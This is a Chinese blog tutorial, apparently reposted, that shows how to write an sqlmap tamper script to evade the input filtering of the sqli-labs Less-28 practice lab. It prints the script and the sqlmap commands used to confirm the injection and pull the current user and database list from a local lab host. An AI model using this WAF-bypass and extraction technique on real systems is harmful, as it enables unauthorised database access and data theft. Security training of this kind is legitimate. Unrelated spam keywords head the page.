国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

滲透測試-sqlmap繞過WAF腳本編寫

這篇具有很好參考價值的文章主要介紹了滲透測試-sqlmap繞過WAF腳本編寫。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

sqlmap繞過WAF腳本編寫

前言

一、什么是sqlmap和tamper腳本

Sqlmap一款功能強大集成了多種數(shù)據(jù)庫識別及注入方式,多用于識別和利用Web 應用程序注入漏洞的工具,它的優(yōu)點在于集成了大量 payload,對檢測與利用的自動化處理(數(shù)據(jù)庫指紋、訪問底層文件系統(tǒng)、執(zhí)行命令)。 我們之前學習時間盲注的時候,可以針對時間盲注類型的漏洞的寫個專門的自動化腳本來幫忙我們測試,但是不比這個sqlmap這個集成工具強大。

1.tamper的作用
使用SQLMap提供的tamper腳本,可在一定程度上避開應用程序的敏感字符過濾、繞過WAF規(guī)則的阻擋,繼而進行滲透攻擊。

部分防護系統(tǒng)的縮寫:

WAF:Web應用程序防火墻,Web Application Firewall
IPS:入侵防御系統(tǒng), Intrusion Prevention System
IDS:入侵檢測系統(tǒng),Intrusion Detection System

2.tamper用法
–tamper=TAMPER 利用給定的腳本進行篡改注入數(shù)據(jù)。其用法可舉例說明:
python sqlmap.py -u “http://…/?uname=admin&pwd=pass123”?--level=5?--risk=3 -p “uname” --tamper=xxx.py
表示對指定的url地址,以所設置的level等級、risk等級,并采用選定的tamper篡改腳本對參數(shù)“uname”進行檢測

二、利用sqlmap腳本進行掃描獲取數(shù)據(jù)庫信息

1.編寫sqlmap繞過WAF腳本

利用sqli-labs實驗室第28關(guān)進行實驗,進行代碼審計可知
滲透測試-sqlmap繞過WAF腳本編寫
代碼中對各種符號,空格進行了過濾,說明存在WAF,我們可以進行編寫sqlmap腳本進行繞過,這里編寫一個sqli-labs28.py腳本到sqlmap的tamper目錄下
腳本模板如下:

#!/usr/bin/env python

“”"
Copyright ? 2006-2021 sqlmap developers (https://sqlmap.org/)
See the file ‘LICENSE’ for copying permission
“”"

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

priority = PRIORITY.LOW

def dependencies():
pass

def tamper(payload, **kwargs):
“”"
Bypass sqli-lasbs/Less-28
“”"
if payload:
payload = payload.replace(‘union select’,‘unnion all select’).replace(’ ‘,’%0a’)
return payload

2.通過sqlmap進行獲取數(shù)據(jù)庫信息

這里我在window下使用sqlmap,搭建python環(huán)境進行運行
首先,進行對目標url進行掃描
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --flush-session
滲透測試-sqlmap繞過WAF腳本編寫
滲透測試-sqlmap繞過WAF腳本編寫
掃描結(jié)果可知,id參數(shù)沒有存在注入點,這里我們腳本僥幸掃描試試是否可以繞過過濾點進行注入,獲取信息。
輸入腳本文件
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --flush-session --tamper=sqli-labs28
滲透測試-sqlmap繞過WAF腳本編寫
滲透測試-sqlmap繞過WAF腳本編寫
由測試結(jié)果可知,注入成功,接下來我們獲取數(shù)據(jù)信息
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --tamper=sqli-labs28 --current-user(輸出當前用戶)
滲透測試-sqlmap繞過WAF腳本編寫
由結(jié)果可知,獲取信息成功,接下來我們獲取有哪些數(shù)據(jù)庫
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-28/?id=1” --tamper=sqli-labs28 --dbs -v 3(通過payload獲取數(shù)據(jù)庫內(nèi)容)
滲透測試-sqlmap繞過WAF腳本編寫
滲透測試-sqlmap繞過WAF腳本編寫
滲透測試-sqlmap繞過WAF腳本編寫
由以上結(jié)果可知,數(shù)據(jù)庫信息獲取成功,實驗結(jié)束。
接下來大家就可以利用sqlmap核心語法獲取更多的信息。

總結(jié)

本次實驗是利用sqlmap編寫腳本繞過WAF的一個經(jīng)典實例,通過代碼審計發(fā)現(xiàn)存在符號和空格過濾,我們就可以進行編寫腳本進行繞過,這樣我們就可以通過繞過WAF,獲取對方的數(shù)據(jù)庫信息了。文章來源地址http://www.zghlxwxcb.cn/news/detail-491205.html

到了這里,關(guān)于滲透測試-sqlmap繞過WAF腳本編寫的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領支付寶紅包贊助服務器費用

相關(guān)文章

  • [滲透測試]—3.3 漏洞評估和報告編寫

    [滲透測試]—3.3 漏洞評估和報告編寫

    在滲透測試過程中,漏洞評估和報告編寫是非常重要的環(huán)節(jié)。漏洞評估可以幫助你確定哪些漏洞更加關(guān)鍵,需要優(yōu)先修復。而報告則是向客戶或公司領導展示滲透測試結(jié)果的關(guān)鍵文檔。本節(jié)將介紹漏洞評估和報告編寫的基本概念、方法和要點。 漏洞評估是對已發(fā)現(xiàn)的安全漏洞

    2024年02月15日
    瀏覽(21)
  • mysql waf繞過-WAF Bypass技巧(2)

    mysql waf繞過-WAF Bypass技巧(2)

    ?數(shù)據(jù)庫waf繞過的一些玩法 WAF Bypass技巧(0)_luozhonghua2000的博客-CSDN博客? WAF繞過-WAF Bypass技巧(1)_luozhonghua2000的博客-CSDN博客 ?數(shù)據(jù)庫特性 第一篇: Mysql數(shù)據(jù)庫特性 0x01 前言 我們經(jīng)常利用一些數(shù)據(jù)庫特性來進行WAF繞過。在Mysgl中,比如可以這樣? ? ? ?位置一: 參數(shù)和union之間的位

    2024年02月08日
    瀏覽(19)
  • 24 WEB漏洞-文件上傳之WAF繞過及安全修復_阿里云盾waf繞過怎么修復

    24 WEB漏洞-文件上傳之WAF繞過及安全修復_阿里云盾waf繞過怎么修復

    目錄 WAF繞過 上傳參數(shù)名解析:明確哪些東西能修改? 常見繞過方法: `符號變異-防匹配(’ \\\" ;)` 數(shù)據(jù)截斷-防匹配(%00 ; 換行) 重復數(shù)據(jù)-防匹配(參數(shù)多次) 搜索引擎搜索fuzz web字典 文件上傳安全修復方案 WAF繞過 safedog BT(寶塔) XXX云盾 寶塔過濾的比安全狗厲害一些,在真實情況下現(xiàn)

    2024年02月20日
    瀏覽(28)
  • [滲透測試]—7.1 漏洞利用開發(fā)和Shellcode編寫

    [滲透測試]—7.1 漏洞利用開發(fā)和Shellcode編寫

    在本章節(jié)中,我們將學習漏洞利用開發(fā)和Shellcode編寫的基本概念和技巧。我們會盡量詳細、通俗易懂地講解,并提供盡可能多的實例。 漏洞利用開發(fā)是滲透測試中的高級技能。當你發(fā)現(xiàn)一個軟件或系統(tǒng)存在漏洞時,你需要編寫一段代碼來利用這個漏洞,從而在目標系統(tǒng)上執(zhí)行

    2024年02月11日
    瀏覽(59)
  • waf繞過

    waf繞過

    硬件Waf: 綠盟、安恒、啟明、知道創(chuàng)宇等 ?? ??? ?需要選擇模式 ? ? ? ? 透明模式 ? ? ? ? 反向代理分為反向代理(代理模式)與反向代理(牽引模式) ? ? ? ? 反向代理又分為兩種模式,反向代理(代理模式)與反向代理(牽引模式) ?? ??? ?旁路監(jiān)控 軟件Waf: 安

    2024年02月08日
    瀏覽(16)
  • RCE攻擊繞過WAF詳解

    RCE攻擊繞過WAF詳解

    今天繼續(xù)給大家介紹滲透測試相關(guān)知識,本文主要內(nèi)容是RCE攻擊繞過WAF詳解。 免責聲明: 本文所介紹的內(nèi)容僅做學習交流使用,嚴禁利用文中技術(shù)進行非法行為,否則造成一切嚴重后果自負! 再次強調(diào):嚴禁對未授權(quán)設備進行滲透測試! 針對RCE類型的攻擊,有時WAF會進行攔

    2023年04月27日
    瀏覽(28)
  • 03-WAF繞過-漏洞利用之注入上傳跨站等繞過

    03-WAF繞過-漏洞利用之注入上傳跨站等繞過

    1.繞過cc流量 通過sqlmap對網(wǎng)站進行測試的時候,如果對方有cc流量防護,需要給sqlmap設置一個代理進行注入。 防cc攔截:修改user-agent頭+代理(付費代理池) 修改user-agent頭: ? (1)加參數(shù):–random-agent 使用隨機user-agent進行測試。sqlmap有一個文件中儲存了各種各樣的user-age

    2024年02月02日
    瀏覽(28)
  • 網(wǎng)絡安全各類WAF繞過技巧

    網(wǎng)絡安全各類WAF繞過技巧

    即傳入一段長數(shù)據(jù)使waf失效,從而實現(xiàn)繞過waf。某些waf處理POST的數(shù)據(jù)時,只會檢測開頭的8K,后面選擇全部放過。 例如,當發(fā)現(xiàn)某網(wǎng)站存在一個反序列化漏洞時,但是無回顯,被waf攔截了 利用臟數(shù)據(jù)插入5000個x字符,可以成功繞過。 對請求進行并發(fā),攻擊請求會被負載均衡

    2024年02月09日
    瀏覽(19)
  • WAF繞過漏洞利用——漏洞利用之注入上傳跨站等繞過

    目錄 前言: (一)SQL注入 0x01? sqlmap注入 修改user-agent頭: (二)文件上傳

    2024年02月12日
    瀏覽(21)
  • 深入waf繞過 (云盾,寶塔,安全狗)(19)

    深入waf繞過 (云盾,寶塔,安全狗)(19)

    簡要其他的繞過方法 第一種方式? ip白名單 在waf里面有設置,白名單就是允許通過的,白名單這些東西就不會進行攔截,如果有這個白名單,你還知道對方白名單的ip地址,根據(jù)他的IP地址,去偽造自己是白名單的IP地址,waf就不會攔截, 有前提條件第一個知道對方的白名單

    2024年02月13日
    瀏覽(16)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包